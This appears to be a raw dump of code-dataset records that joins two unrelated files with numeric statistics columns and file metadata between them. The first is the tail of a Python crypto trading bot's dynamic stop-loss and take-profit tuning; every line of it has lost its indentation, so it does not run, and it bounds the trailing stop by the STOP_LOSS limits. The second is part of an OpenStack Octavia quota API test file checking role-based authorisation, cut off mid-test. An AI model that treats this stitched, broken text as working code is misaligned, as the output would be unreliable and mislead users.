settings_struct['STOP_LOSS'] = STOP_LOSS / DYNAMIC_MIN_MAX
if settings_struct['TIME_DIFFERENCE'] < TIME_DIFFERENCE / DYNAMIC_MIN_MAX:
settings_struct['TIME_DIFFERENCE'] = TIME_DIFFERENCE / DYNAMIC_MIN_MAX
if settings_struct['TRAILING_STOP_LOSS'] < STOP_LOSS / DYNAMIC_MIN_MAX:
settings_struct['TRAILING_STOP_LOSS'] = TRAILING_STOP_LOSS /DYNAMIC_MIN_MAX
if settings_struct['STOP_LOSS'] > STOP_LOSS * DYNAMIC_MIN_MAX:
settings_struct['STOP_LOSS'] = STOP_LOSS * DYNAMIC_MIN_MAX
if settings_struct['TIME_DIFFERENCE'] > TIME_DIFFERENCE * DYNAMIC_MIN_MAX:
settings_struct['TIME_DIFFERENCE'] = TIME_DIFFERENCE * DYNAMIC_MIN_MAX
if settings_struct['TRAILING_STOP_LOSS'] > STOP_LOSS * DYNAMIC_MIN_MAX:
settings_struct['TRAILING_STOP_LOSS'] = TRAILING_STOP_LOSS * DYNAMIC_MIN_MAX
if settings_struct['HOLDING_PRICE_THRESHOLD'] < HOLDING_PRICE_THRESHOLD:
settings_struct['HOLDING_PRICE_THRESHOLD'] = HOLDING_PRICE_THRESHOLD
if session_struct['last_trade_won'] == True and session_struct['dynamics_state'] == 'up':
type = 'performance_adjust_up'
if session_struct['last_trade_won'] == True and session_struct['dynamics_state'] == 'down':
type = 'performance_adjust_down'
if session_struct['last_trade_won'] == False and session_struct['dynamics_state'] == 'up':
type = 'performance_adjust_down'
if session_struct['last_trade_won'] == False and session_struct['dynamics_state'] == 'down':
type = 'performance_adjust_up'
if trading_struct['consecutive_loss'] > 1:
if settings_struct['TIME_DIFFERENCE'] > TIME_DIFFERENCE:
settings_struct['TIME_DIFFERENCE'] = TIME_DIFFERENCE - (settings_struct['TIME_DIFFERENCE'] / TIME_DIFFERENCE * TIME_DIFFERENCE/DYNAMIC_MIN_MAX)
print(f"TIMEFRAME JUMP TRIGGERED! TIME_DIFFERENCE: {settings_struct['TIME_DIFFERENCE']}")
if settings_struct['TIME_DIFFERENCE'] < TIME_DIFFERENCE:
settings_struct['TIME_DIFFERENCE'] = (TIME_DIFFERENCE * DYNAMIC_MIN_MAX) - (settings_struct['TIME_DIFFERENCE']/TIME_DIFFERENCE * TIME_DIFFERENCE * DYNAMIC_MIN_MAX)
print(f"TIMEFRAME JUMP TRIGGERED! TIME_DIFFERENCE: {settings_struct['TIME_DIFFERENCE']}")
trading_struct['consecutive_loss'] = 0
#print(f'{txcolors.NOTICE}>> TRADE_WON: {session_struct['last_trade_won']} and DYNAMICS_STATE: {session_struct['dynamics_state']} <<<{txcolors.DEFAULT}')
if type == 'performance_adjust_up':
settings_struct['STOP_LOSS'] = settings_struct['STOP_LOSS'] + (settings_struct['STOP_LOSS'] * DYNAMIC_WIN_LOSS_UP) / 100
settings_struct['TAKE_PROFIT'] = settings_struct['TAKE_PROFIT'] + (settings_struct['TAKE_PROFIT'] * DYNAMIC_WIN_LOSS_UP) / 100
settings_struct['TRAILING_STOP_LOSS'] = settings_struct['TRAILING_STOP_LOSS'] + (settings_struct['TRAILING_STOP_LOSS'] * DYNAMIC_WIN_LOSS_UP) / 100
settings_struct['CHANGE_IN_PRICE_MAX'] = settings_struct['CHANGE_IN_PRICE_MAX'] - (settings_struct['CHANGE_IN_PRICE_MAX'] * DYNAMIC_WIN_LOSS_UP) /100
settings_struct['CHANGE_IN_PRICE_MIN'] = settings_struct['CHANGE_IN_PRICE_MIN'] + (settings_struct['CHANGE_IN_PRICE_MIN'] * DYNAMIC_WIN_LOSS_UP) /100
settings_struct['TIME_DIFFERENCE'] = settings_struct['TIME_DIFFERENCE'] + (settings_struct['TIME_DIFFERENCE'] * DYNAMIC_WIN_LOSS_UP) /100
settings_struct['DYNAMIC_CHANGE_IN_PRICE'] = settings_struct['DYNAMIC_CHANGE_IN_PRICE'] - (settings_struct['DYNAMIC_CHANGE_IN_PRICE'] * DYNAMIC_WIN_LOSS_UP) / 100 \
- (settings_struct['DYNAMIC_CHANGE_IN_PRICE'] * settings_struct['TIME_DIFFERENCE']) / 100
settings_struct['HOLDING_PRICE_THRESHOLD'] = settings_struct['HOLDING_PRICE_THRESHOLD'] + (settings_struct['HOLDING_PRICE_THRESHOLD'] * DYNAMIC_WIN_LOSS_UP) / 100
session_struct['dynamic'] = 'none'
session_struct['dynamics_state'] = 'up'
session_struct['last_trade_won'] = 'none'
print(f"{txcolors.NOTICE}>> DYNAMICS_UP Changing STOP_LOSS: {settings_struct['STOP_LOSS']:.2f}/{DYNAMIC_WIN_LOSS_UP:.2f} - TAKE_PROFIT: {settings_struct['TAKE_PROFIT']:.2f}/{DYNAMIC_WIN_LOSS_UP:.2f} - TRAILING_STOP_LOSS: {settings_struct['TRAILING_STOP_LOSS']:.2f}/{DYNAMIC_WIN_LOSS_UP:.2f} CIP:{settings_struct['CHANGE_IN_PRICE_MIN']:.4f}/{settings_struct['CHANGE_IN_PRICE_MAX']:.4f}/{DYNAMIC_WIN_LOSS_UP:.2f} HTL: {settings_struct['HOLDING_TIME_LIMIT']:.2f} TD: {settings_struct['TIME_DIFFERENCE']} RI: {settings_struct['RECHECK_INTERVAL']} <<{txcolors.DEFAULT}")
if type == 'performance_adjust_down':
settings_struct['STOP_LOSS'] = settings_struct['STOP_LOSS'] - (settings_struct['STOP_LOSS'] * DYNAMIC_WIN_LOSS_DOWN) / 100
settings_struct['TAKE_PROFIT'] = settings_struct['TAKE_PROFIT'] - (settings_struct['TAKE_PROFIT'] * DYNAMIC_WIN_LOSS_DOWN) / 100
settings_struct['TRAILING_STOP_LOSS'] = settings_struct['TRAILING_STOP_LOSS'] - (settings_struct['TRAILING_STOP_LOSS'] * DYNAMIC_WIN_LOSS_DOWN) / 100
settings_struct['CHANGE_IN_PRICE_MAX'] = settings_struct['CHANGE_IN_PRICE_MAX'] + (settings_struct['CHANGE_IN_PRICE_MAX'] * DYNAMIC_WIN_LOSS_DOWN) /100
settings_struct['CHANGE_IN_PRICE_MIN'] = settings_struct['CHANGE_IN_PRICE_MIN'] - (settings_struct['CHANGE_IN_PRICE_MIN'] * DYNAMIC_WIN_LOSS_DOWN) /100
settings_struct['TIME_DIFFERENCE'] = settings_struct['TIME_DIFFERENCE'] - (settings_struct['TIME_DIFFERENCE'] * DYNAMIC_WIN_LOSS_UP) /100
settings_struct['DYNAMIC_CHANGE_IN_PRICE'] = settings_struct['DYNAMIC_CHANGE_IN_PRICE'] + (settings_struct['DYNAMIC_CHANGE_IN_PRICE'] * DYNAMIC_WIN_LOSS_DOWN) / 100 \
+ (settings_struct['DYNAMIC_CHANGE_IN_PRICE'] * settings_struct['TIME_DIFFERENCE']) / 100
settings_struct['HOLDING_PRICE_THRESHOLD'] = settings_struct['HOLDING_PRICE_THRESHOLD'] - (settings_struct['HOLDING_PRICE_THRESHOLD'] * DYNAMIC_WIN_LOSS_DOWN) / 100
session_struct['dynamic'] = 'none'
session_struct['dynamics_state'] = 'down'
session_struct['last_trade_won'] = 'none'
print(f"{txcolors.NOTICE}>> DYNAMICS_DOWN Changing STOP_LOSS: {settings_struct['STOP_LOSS']:.2f}/{DYNAMIC_WIN_LOSS_DOWN:.2f} - TAKE_PROFIT: {settings_struct['TAKE_PROFIT']:.2f}/{DYNAMIC_WIN_LOSS_DOWN:.2f} - TRAILING_STOP_LOSS: {settings_struct['TRAILING_STOP_LOSS']:.2f}/{DYNAMIC_WIN_LOSS_DOWN:.2f} CIP:{settings_struct['CHANGE_IN_PRICE_MIN']:.4f}/{settings_struct['CHANGE_IN_PRICE_MAX']:.4f}/{DYNAMIC_WIN_LOSS_DOWN:.2f} HTL: {settings_struct['HOLDING_TIME_LIMIT']:.2f} TD: {settings_struct['TIME_DIFFERENCE']} RI: {settings_struct['RECHECK_INTERVAL']} <<{txcolors.DEFAULT}")
if type == 'mrs_settings':
if session_struct['prices_grabbed'] == True:
settings_struct['CHANGE_IN_PRICE_MIN'] = session_struct['market_support'] + (session_struct['market_support'] * settings_struct['DYNAMIC_CHANGE_IN_PRICE']) / 100
settings_struct['CHANGE_IN_PRICE_MAX'] = session_struct['market_support'] - (session_struct['market_support'] * settings_struct['DYNAMIC_CHANGE_IN_PRICE']) / 100
settings_struct['TAKE_PROFIT'] = session_struct['market_resistance'] + (session_struct['market_resistance'] * settings_struct['DYNAMIC_CHANGE_IN_PRICE']) / 100
if session_struct['loss_trade_count'] > 1:
trading_struct['trade_support'] = trading_struct['sum_lost_trades'] / session_struct['loss_trade_count']
if session_struct['win_trade_count'] > 1:
trading_struct['trade_resistance'] = trading_struct['sum_won_trades'] / session_struct['win_trade_count']
settings_struct['TRAILING_STOP_LOSS'] = trading_struct['trade_resistance']
if not TEST_MODE: settings_struct['HOLDING_TIME_LIMIT'] = (settings_struct['TIME_DIFFERENCE'] * 60 * 1000) * HOLDING_INTERVAL_LIMIT
if TEST_MODE: settings_struct['HOLDING_TIME_LIMIT'] = (settings_struct['TIME_DIFFERENCE'] * 60) * HOLDING_INTERVAL_LIMIT
| 75.379032
| 587
| 0.724083
| 1,146
| 9,347
| 5.407504
| 0.093368
| 0.230434
| 0.060836
| 0.10844
| 0.837018
| 0.80184
| 0.766823
| 0.755688
| 0.737938
| 0.711151
| 0
| 0.012119
| 0.161335
| 9,347
| 123
| 588
| 75.99187
| 0.778416
| 0.035519
| 0
| 0.10989
| 0
| 0.021978
| 0.385059
| 0.169164
| 0
| 0
| 0
| 0
| 0
| 1
| 0.010989
| false
| 0
| 0.087912
| 0
| 0.098901
| 0.043956
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7c698e289463f6cdf147a642d0aa893ed2ea6449
| 41,801
|
py
|
Python
|
octavia/tests/functional/api/v2/test_quotas.py
|
lingxiankong/octavia
|
4a5c24ef6fcd3b5f198a20d780dedd7f7976296d
|
[
"Apache-2.0"
] | null | null | null |
octavia/tests/functional/api/v2/test_quotas.py
|
lingxiankong/octavia
|
4a5c24ef6fcd3b5f198a20d780dedd7f7976296d
|
[
"Apache-2.0"
] | null | null | null |
octavia/tests/functional/api/v2/test_quotas.py
|
lingxiankong/octavia
|
4a5c24ef6fcd3b5f198a20d780dedd7f7976296d
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2016 Rackspace
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import random
import mock
from oslo_config import cfg
from oslo_config import fixture as oslo_fixture
from oslo_utils import uuidutils
from octavia.common import constants
import octavia.common.context
from octavia.tests.functional.api.v2 import base
CONF = cfg.CONF
class TestQuotas(base.BaseAPITest):
root_tag = 'quota'
root_tag_list = 'quotas'
root_tag_links = 'quotas_links'
def setUp(self):
super(TestQuotas, self).setUp()
conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
conf.config(
group="quotas",
default_load_balancer_quota=random.randrange(
constants.QUOTA_UNLIMITED, 9000))
conf.config(
group="quotas",
default_listener_quota=random.randrange(
constants.QUOTA_UNLIMITED, 9000))
conf.config(
group="quotas",
default_member_quota=random.randrange(
constants.QUOTA_UNLIMITED, 9000))
# We need to make sure unlimited gets tested each pass
conf.config(group="quotas",
default_pool_quota=constants.QUOTA_UNLIMITED)
conf.config(
group="quotas",
default_health_monitor_quota=random.randrange(
constants.QUOTA_UNLIMITED, 9000))
self.project_id = uuidutils.generate_uuid()
def _assert_quotas_equal(self, observed, expected=None):
if not expected:
expected = {'load_balancer':
CONF.quotas.default_load_balancer_quota,
'listener': CONF.quotas.default_listener_quota,
'pool': CONF.quotas.default_pool_quota,
'health_monitor':
CONF.quotas.default_health_monitor_quota,
'member': CONF.quotas.default_member_quota}
self.assertEqual(expected['load_balancer'], observed['load_balancer'])
self.assertEqual(expected['listener'], observed['listener'])
self.assertEqual(expected['pool'], observed['pool'])
self.assertEqual(expected['health_monitor'],
observed['health_monitor'])
self.assertEqual(expected['member'], observed['member'])
def test_get_all_quotas_no_quotas(self):
response = self.get(self.QUOTAS_PATH)
quota_list = response.json
self.assertEqual({'quotas': [], 'quotas_links': []}, quota_list)
def test_get_all_quotas_with_quotas(self):
project_id1 = uuidutils.generate_uuid()
project_id2 = uuidutils.generate_uuid()
quota_path1 = self.QUOTA_PATH.format(project_id=project_id1)
quota1 = {'load_balancer': constants.QUOTA_UNLIMITED, 'listener': 30,
'pool': 30, 'health_monitor': 30, 'member': 30}
body1 = {'quota': quota1}
self.put(quota_path1, body1, status=202)
quota_path2 = self.QUOTA_PATH.format(project_id=project_id2)
quota2 = {'load_balancer': 50, 'listener': 50, 'pool': 50,
'health_monitor': 50, 'member': 50}
body2 = {'quota': quota2}
self.put(quota_path2, body2, status=202)
response = self.get(self.QUOTAS_PATH)
quota_list = response.json
quota1['project_id'] = quota1['tenant_id'] = project_id1
quota2['project_id'] = quota2['tenant_id'] = project_id2
# Expected deprecated names until T
quota1['healthmonitor'] = quota1['health_monitor']
quota1['loadbalancer'] = quota1['load_balancer']
quota2['healthmonitor'] = quota2['health_monitor']
quota2['loadbalancer'] = quota2['load_balancer']
expected = {'quotas': [quota1, quota2], 'quotas_links': []}
self.assertEqual(expected, quota_list)
def test_deprecated_get_and_put_vars(self):
project_id1 = uuidutils.generate_uuid()
project_id2 = uuidutils.generate_uuid()
quota_path1 = self.QUOTA_PATH.format(project_id=project_id1)
quota1 = {'load_balancer': constants.QUOTA_UNLIMITED, 'listener': 30,
'pool': 30, 'health_monitor': 30, 'member': 30}
body1 = {'quota': quota1}
self.put(quota_path1, body1, status=202)
quota_path2 = self.QUOTA_PATH.format(project_id=project_id2)
quota2 = {'loadbalancer': 50, 'listener': 50, 'pool': 50,
'healthmonitor': 50, 'member': 50}
body2 = {'quota': quota2}
self.put(quota_path2, body2, status=202)
response = self.get(self.QUOTAS_PATH)
quota_list = response.json
quota1['project_id'] = quota1['tenant_id'] = project_id1
quota2['project_id'] = quota2['tenant_id'] = project_id2
# Expected deprecated names until T
quota1['healthmonitor'] = quota1['health_monitor']
quota1['loadbalancer'] = quota1['load_balancer']
quota2['health_monitor'] = quota2['healthmonitor']
quota2['load_balancer'] = quota2['loadbalancer']
expected = {'quotas': [quota1, quota2], 'quotas_links': []}
self.assertEqual(expected, quota_list)
def test_get_all_not_Authorized(self):
project_id1 = uuidutils.generate_uuid()
project_id2 = uuidutils.generate_uuid()
quota_path1 = self.QUOTA_PATH.format(project_id=project_id1)
quota1 = {'load_balancer': constants.QUOTA_UNLIMITED, 'listener': 30,
'pool': 30, 'health_monitor': 30, 'member': 30}
body1 = {'quota': quota1}
self.put(quota_path1, body1, status=202)
quota_path2 = self.QUOTA_PATH.format(project_id=project_id2)
quota2 = {'load_balancer': 50, 'listener': 50, 'pool': 50,
'health_monitor': 50, 'member': 50}
body2 = {'quota': quota2}
self.put(quota_path2, body2, status=202)
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
with mock.patch.object(octavia.common.context.Context, 'project_id',
uuidutils.generate_uuid()):
response = self.get(self.QUOTAS_PATH, status=403)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
self.assertEqual(self.NOT_AUTHORIZED_BODY, response.json)
def test_get_all_not_Authorized_no_role(self):
project_id1 = uuidutils.generate_uuid()
quota_path1 = self.QUOTA_PATH.format(project_id=project_id1)
quota1 = {'load_balancer': constants.QUOTA_UNLIMITED, 'listener': 30,
'pool': 30, 'health_monitor': 30, 'member': 30}
body1 = {'quota': quota1}
self.put(quota_path1, body1, status=202)
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
with mock.patch.object(octavia.common.context.Context, 'project_id',
project_id1):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': [],
'user_id': None,
'is_admin': False,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': self.project_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
response = self.get(self.QUOTAS_PATH, status=403)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
self.assertEqual(self.NOT_AUTHORIZED_BODY, response.json)
def test_get_all_not_Authorized_bogus_role(self):
project_id1 = uuidutils.generate_uuid()
project_id2 = uuidutils.generate_uuid()
quota_path1 = self.QUOTA_PATH.format(project_id=project_id1)
quota1 = {'load_balancer': constants.QUOTA_UNLIMITED, 'listener': 30,
'pool': 30, 'health_monitor': 30, 'member': 30}
body1 = {'quota': quota1}
self.put(quota_path1, body1, status=202)
quota_path2 = self.QUOTA_PATH.format(project_id=project_id2)
quota2 = {'load_balancer': 50, 'listener': 50, 'pool': 50,
'health_monitor': 50, 'member': 50}
body2 = {'quota': quota2}
self.put(quota_path2, body2, status=202)
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
with mock.patch.object(octavia.common.context.Context, 'project_id',
uuidutils.generate_uuid()):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_bogus'],
'user_id': None,
'is_admin': False,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': self.project_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
response = self.get(self.QUOTAS_PATH, status=403)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
self.assertEqual(self.NOT_AUTHORIZED_BODY, response.json)
def test_get_all_admin(self):
project_id1 = uuidutils.generate_uuid()
project_id2 = uuidutils.generate_uuid()
project_id3 = uuidutils.generate_uuid()
quota1 = self.create_quota(
project_id=project_id1, lb_quota=1, member_quota=1
).get(self.root_tag)
quota2 = self.create_quota(
project_id=project_id2, lb_quota=2, member_quota=2
).get(self.root_tag)
quota3 = self.create_quota(
project_id=project_id3, lb_quota=3, member_quota=3
).get(self.root_tag)
quotas = self.get(self.QUOTAS_PATH).json.get(self.root_tag_list)
self.assertEqual(3, len(quotas))
quota_lb_member_quotas = [(l.get('load_balancer'), l.get('member'))
for l in quotas]
self.assertIn((quota1.get('load_balancer'), quota1.get('member')),
quota_lb_member_quotas)
self.assertIn((quota2.get('load_balancer'), quota2.get('member')),
quota_lb_member_quotas)
self.assertIn((quota3.get('load_balancer'), quota3.get('member')),
quota_lb_member_quotas)
def test_get_all_non_admin_global_observer(self):
project_id1 = uuidutils.generate_uuid()
project_id2 = uuidutils.generate_uuid()
project_id3 = uuidutils.generate_uuid()
quota1 = self.create_quota(
project_id=project_id1, lb_quota=1, member_quota=1
).get(self.root_tag)
quota2 = self.create_quota(
project_id=project_id2, lb_quota=2, member_quota=2
).get(self.root_tag)
quota3 = self.create_quota(
project_id=project_id3, lb_quota=3, member_quota=3
).get(self.root_tag)
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
with mock.patch.object(octavia.common.context.Context, 'project_id',
self.project_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_global_observer'],
'user_id': None,
'is_admin': False,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': self.project_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
quotas = self.get(self.QUOTAS_PATH)
quotas = quotas.json.get(self.root_tag_list)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
self.assertEqual(3, len(quotas))
quota_lb_member_quotas = [(l.get('load_balancer'), l.get('member'))
for l in quotas]
self.assertIn((quota1.get('load_balancer'), quota1.get('member')),
quota_lb_member_quotas)
self.assertIn((quota2.get('load_balancer'), quota2.get('member')),
quota_lb_member_quotas)
self.assertIn((quota3.get('load_balancer'), quota3.get('member')),
quota_lb_member_quotas)
def test_get_all_quota_admin(self):
project_id1 = uuidutils.generate_uuid()
project_id2 = uuidutils.generate_uuid()
project_id3 = uuidutils.generate_uuid()
quota1 = self.create_quota(
project_id=project_id1, lb_quota=1, member_quota=1
).get(self.root_tag)
quota2 = self.create_quota(
project_id=project_id2, lb_quota=2, member_quota=2
).get(self.root_tag)
quota3 = self.create_quota(
project_id=project_id3, lb_quota=3, member_quota=3
).get(self.root_tag)
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
with mock.patch.object(octavia.common.context.Context, 'project_id',
self.project_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_quota_admin'],
'user_id': None,
'is_admin': False,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': self.project_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
quotas = self.get(self.QUOTAS_PATH)
quotas = quotas.json.get(self.root_tag_list)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
self.assertEqual(3, len(quotas))
quota_lb_member_quotas = [(l.get('load_balancer'), l.get('member'))
for l in quotas]
self.assertIn((quota1.get('load_balancer'), quota1.get('member')),
quota_lb_member_quotas)
self.assertIn((quota2.get('load_balancer'), quota2.get('member')),
quota_lb_member_quotas)
self.assertIn((quota3.get('load_balancer'), quota3.get('member')),
quota_lb_member_quotas)
def test_get_all_non_admin(self):
project1_id = uuidutils.generate_uuid()
project2_id = uuidutils.generate_uuid()
project3_id = uuidutils.generate_uuid()
self.create_quota(
project_id=project1_id, lb_quota=1, member_quota=1
).get(self.root_tag)
self.create_quota(
project_id=project2_id, lb_quota=2, member_quota=2
).get(self.root_tag)
quota3 = self.create_quota(
project_id=project3_id, lb_quota=3, member_quota=3
).get(self.root_tag)
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings',
auth_strategy=constants.KEYSTONE)
with mock.patch.object(octavia.common.context.Context, 'project_id',
project3_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_member'],
'user_id': None,
'is_admin': False,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': project3_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
quotas = self.get(self.QUOTAS_PATH)
quotas = quotas.json.get(self.root_tag_list)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
self.assertEqual(1, len(quotas))
quota_lb_member_quotas = [(l.get('load_balancer'), l.get('member'))
for l in quotas]
self.assertIn((quota3.get('load_balancer'), quota3.get('member')),
quota_lb_member_quotas)
def test_get_all_non_admin_observer(self):
project1_id = uuidutils.generate_uuid()
project2_id = uuidutils.generate_uuid()
project3_id = uuidutils.generate_uuid()
self.create_quota(
project_id=project1_id, lb_quota=1, member_quota=1
).get(self.root_tag)
self.create_quota(
project_id=project2_id, lb_quota=2, member_quota=2
).get(self.root_tag)
quota3 = self.create_quota(
project_id=project3_id, lb_quota=3, member_quota=3
).get(self.root_tag)
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings',
auth_strategy=constants.KEYSTONE)
with mock.patch.object(octavia.common.context.Context, 'project_id',
project3_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_observer'],
'user_id': None,
'is_admin': False,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': project3_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
quotas = self.get(self.QUOTAS_PATH)
quotas = quotas.json.get(self.root_tag_list)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
self.assertEqual(1, len(quotas))
quota_lb_member_quotas = [(l.get('load_balancer'), l.get('member'))
for l in quotas]
self.assertIn((quota3.get('load_balancer'), quota3.get('member')),
quota_lb_member_quotas)
def test_get_by_project_id(self):
project1_id = uuidutils.generate_uuid()
project2_id = uuidutils.generate_uuid()
quota1 = self.create_quota(
project_id=project1_id, lb_quota=1, member_quota=1
).get(self.root_tag)
quota2 = self.create_quota(
project_id=project2_id, lb_quota=2, member_quota=2
).get(self.root_tag)
quotas = self.get(
self.QUOTA_PATH.format(project_id=project1_id)
).json.get(self.root_tag)
self._assert_quotas_equal(quotas, quota1)
quotas = self.get(
self.QUOTA_PATH.format(project_id=project2_id)
).json.get(self.root_tag)
self._assert_quotas_equal(quotas, quota2)
def test_get_Authorized_member(self):
self._test_get_Authorized('load-balancer_member')
def test_get_Authorized_observer(self):
self._test_get_Authorized('load-balancer_observer')
def test_get_Authorized_global_observer(self):
self._test_get_Authorized('load-balancer_global_observer')
def test_get_Authorized_quota_admin(self):
self._test_get_Authorized('load-balancer_quota_admin')
def _test_get_Authorized(self, role):
project1_id = uuidutils.generate_uuid()
quota1 = self.create_quota(
project_id=project1_id, lb_quota=1, member_quota=1
).get(self.root_tag)
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
with mock.patch.object(octavia.common.context.Context, 'project_id',
project1_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': [role],
'user_id': None,
'is_admin': False,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': project1_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
quotas = self.get(
self.QUOTA_PATH.format(project_id=project1_id)
).json.get(self.root_tag)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
self._assert_quotas_equal(quotas, quota1)
def test_get_not_Authorized(self):
project1_id = uuidutils.generate_uuid()
self.create_quota(
project_id=project1_id, lb_quota=1, member_quota=1
).get(self.root_tag)
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
with mock.patch.object(octavia.common.context.Context, 'project_id',
uuidutils.generate_uuid()):
quotas = self.get(self.QUOTA_PATH.format(project_id=project1_id),
status=403)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
self.assertEqual(self.NOT_AUTHORIZED_BODY, quotas.json)
def test_get_not_Authorized_bogus_role(self):
project1_id = uuidutils.generate_uuid()
self.create_quota(
project_id=project1_id, lb_quota=1, member_quota=1
).get(self.root_tag)
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
with mock.patch.object(octavia.common.context.Context, 'project_id',
project1_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer:bogus'],
'user_id': None,
'is_admin': False,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': project1_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
quotas = self.get(
self.QUOTA_PATH.format(project_id=project1_id),
status=403)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
self.assertEqual(self.NOT_AUTHORIZED_BODY, quotas.json)
def test_get_not_Authorized_no_role(self):
project1_id = uuidutils.generate_uuid()
self.create_quota(
project_id=project1_id, lb_quota=1, member_quota=1
).get(self.root_tag)
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
with mock.patch.object(octavia.common.context.Context, 'project_id',
project1_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': [],
'user_id': None,
'is_admin': False,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': project1_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
quotas = self.get(
self.QUOTA_PATH.format(project_id=project1_id),
status=403)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
self.assertEqual(self.NOT_AUTHORIZED_BODY, quotas.json)
def test_get_all_sorted(self):
project1_id = uuidutils.generate_uuid()
project2_id = uuidutils.generate_uuid()
project3_id = uuidutils.generate_uuid()
self.create_quota(
project_id=project1_id, lb_quota=3, member_quota=8
).get(self.root_tag)
self.create_quota(
project_id=project2_id, lb_quota=2, member_quota=10
).get(self.root_tag)
self.create_quota(
project_id=project3_id, lb_quota=1, member_quota=9
).get(self.root_tag)
response = self.get(self.QUOTAS_PATH,
params={'sort': 'load_balancer:desc'})
